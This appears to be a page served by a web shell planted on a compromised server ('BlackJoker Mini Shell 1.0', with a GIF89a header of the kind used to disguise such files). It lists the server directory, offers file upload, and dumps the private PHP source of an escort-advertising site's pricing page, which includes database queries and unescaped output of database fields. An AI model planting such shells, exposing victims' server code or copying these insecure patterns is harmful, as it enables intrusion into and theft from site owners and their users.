GIF89a; Mini Shell

Mini Shell

Direktori : /home/serb/public_html/m/
Upload File :
Current File : /home/serb/public_html/m/escort-advertising.php

<?
session_start();
//include("config.php");
include("lib/globals.php");
include("lib/common.php");
include("lib/functions.php");
$sql="SELECT * FROM page_content WHERE id='68'";
$res=execute_query($sql);
$row=mysql_fetch_array($res);

?>


<!DOCTYPE html> 
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="height=device-height,width=device-width,initial-scale=1.0,maximum-scale=1.0">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<title><?=$row['page_title']?></title>
<link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300,300italic,400italic,600,600italic,700,700italic' rel='stylesheet' type='text/css'>
  <link rel="stylesheet" href="themes/escserve.css" />
  <link rel="stylesheet" href="themes/jquery.mobile.icons.min.css" />
  <link rel="stylesheet" href="jMobile.css" /> 
  <script src="jquery.min.js"></script> 
  <script src="jqueryMobile.js"></script>
  <script>
  	$('#frm').validate({
    rules: {
        userName: {
            required: true
        },
        
        emailAddrs: {
            required: true
        }
    },
    messages: {
        userName: {
            required: "Please enter your first name."
        },
       
        emailAddrs: {
            required: "Please enter your email."
        }
    },
    errorPlacement: function (error, element) {
        error.appendTo(element.parent().prev());
    },
    submitHandler: function (form) {
        $(':mobile-pagecontainer').pagecontainer('change', '#success', {
            reload: false
        });
        return false;
    }
});
  
  </script>
</head> 
<body> 
<div data-role="page" id="page" data-theme="d" data-transition="flip">
	<div id="headerTop"></div>    
    <? include "includes/header.php";?>
   <div data-role="content" id="searchboxx">
    	<span style="float:left !important; margin-top:-5px !important;"><a style="float:left;" href="index.php" class="ui-btn ui-shadow ui-corner-all ui-icon-home ui-btn-icon-notext" data-iconpos="right" title="Go Home">Home</a></span>
        <span style="float:right !important; margin-top:-5px !important;"><a style="float:right;" href="all-escorts.php" class="ui-btn ui-shadow ui-corner-all ui-icon-back ui-btn-icon-notext" data-iconpos="right" title="All Escorts">back</a></span>
    </div>
    <div data-role="content">
     <h2 id="loginheadertext">Escort Advertising</h2>
    	<ul data-role="listview">
                  
								   <li style="border-top:none !important; border-bottom:1px solid #F0D7E2 !important;  background:#FAF2F5 !important;">
				
																			
										<h3 id="pdingleft">Standard Post</h3>
										<p id="pdingleft">Free</p>
                                        <p id="pdingleft">$1.00/repost</p>
										<p id="pdingleft">Reposting upto 6 photos</p>																				
									    <p id="pdingleft">
                                        <? if($_SESSION['userlogin']=="true")
										{?>
                                        
                                         <a href="advertise-vipmember.php" data-transition="fade"><img src="images/getstarted.png" /></a>
                                         <? }
										 	else{
										 ?>
                                         <a href="login.php?advinfo=1" data-transition="fade"><img src="images/getstarted.png" /></a>
                                         <? } ?>
                                         
                                         </p>
											
									
										
									</li>
                                     <li style="border-top:none !important; border-bottom:1px solid #F0D7E2 !important;  background:#FAF2F5 !important;">
				
																			
										<h3 id="pdingleft">Banner</h3>
										<p id="pdingleft">$90/mo</p>
                                        <p id="pdingleft">$3.00/day</p>
										<p id="pdingleft">Personallized Design Multiple placement</p>																				
									    <p id="pdingleft"><img src="images/getstarted.png" /></p>
											
									
										
									</li>
                                     <li style="border-top:none !important; border-bottom:1px solid #F0D7E2 !important; background:#FAF2F5 !important;">
				
																		
										<h3 id="pdingleft">Vip</h3>
										<p id="pdingleft">$33.33/90days</p>
                                        <p id="pdingleft">$50.00/30days</p>
										<p id="pdingleft">Mobile Only</p>																				
									    <p id="pdingleft"> 
										<? if($_SESSION['userlogin']=="true")
										{?>
                                        
                                         <a href="advertise-vipmember.php" data-transition="fade"><img src="images/getstarted.png" /></a>
                                         <? }
										 	else{
										 ?>
                                         <a href="login.php?advinfo=1" data-transition="fade"><img src="images/getstarted.png" /></a>
                                         <? } ?></p>
											
									
										
									</li>
                                    
									   
								                     
                     
        </ul>
	  	
	</div>
	<div data-role="content">
    	<!--<p id="alsignup">Already signed up? <a href="login.php" data-transition="flip"  id="loginnow">Login Now</a></p>-->
        <h2 id="loginheadertext">Product Breakdown</h2>
        <?
		$sql_info="SELECT * FROM advertising_info WHERE status='a' order by id desc";
		$res_info=execute_query($sql_info);
		while($row_info=mysql_fetch_array($res_info))
			{
			 ?>
            <p id="loginalertmsg">
                <span><a href="product-breakdown.php?id=<?=$row_info['id']?>" data-ajax="false" data-transition="fade" id="loginnow"><?=stripslashes($row_info['name'])?></a></span><br/>
                <?=stripslashes($row_info['contain'])?>
            </p>
         <? } ?>                  
        
            
            <div data-role="popup" id="dlg-invalid-credentials" data-dismissible="false" style="max-width:400px;">
                <div role="main" class="ui-content">
                    <h3 class="mc-text-danger">Login Failed</h3>
                    <p>Did you enter the right credentials?</p>
                    <div class="mc-text-center"><a href="#" data-rel="back" class="ui-btn ui-corner-all ui-shadow ui-btn-b mc-top-margin-1-5">OK</a></div>
                </div>
            </div>
        
        
        
	  	
	</div>
    <div data-role="panel" data-display="push" data-position="right" data-theme="d" id="navMenu">
       <? include "includes/right-menubar.php";?>
    </div><!-- /panel -->
	<div data-role="footer" >
    	<div  id="footerTop">
	
        	 <? include "includes/footer.php";?>
           
	</div>
		<div id="footerBottom"><p>Copyright 2015 ESCORTSERVICE.ORG | All Rights reserved.</p></div>
	</div>
</div>
</body>
</html>

./BlackJoker Mini Shell 1.0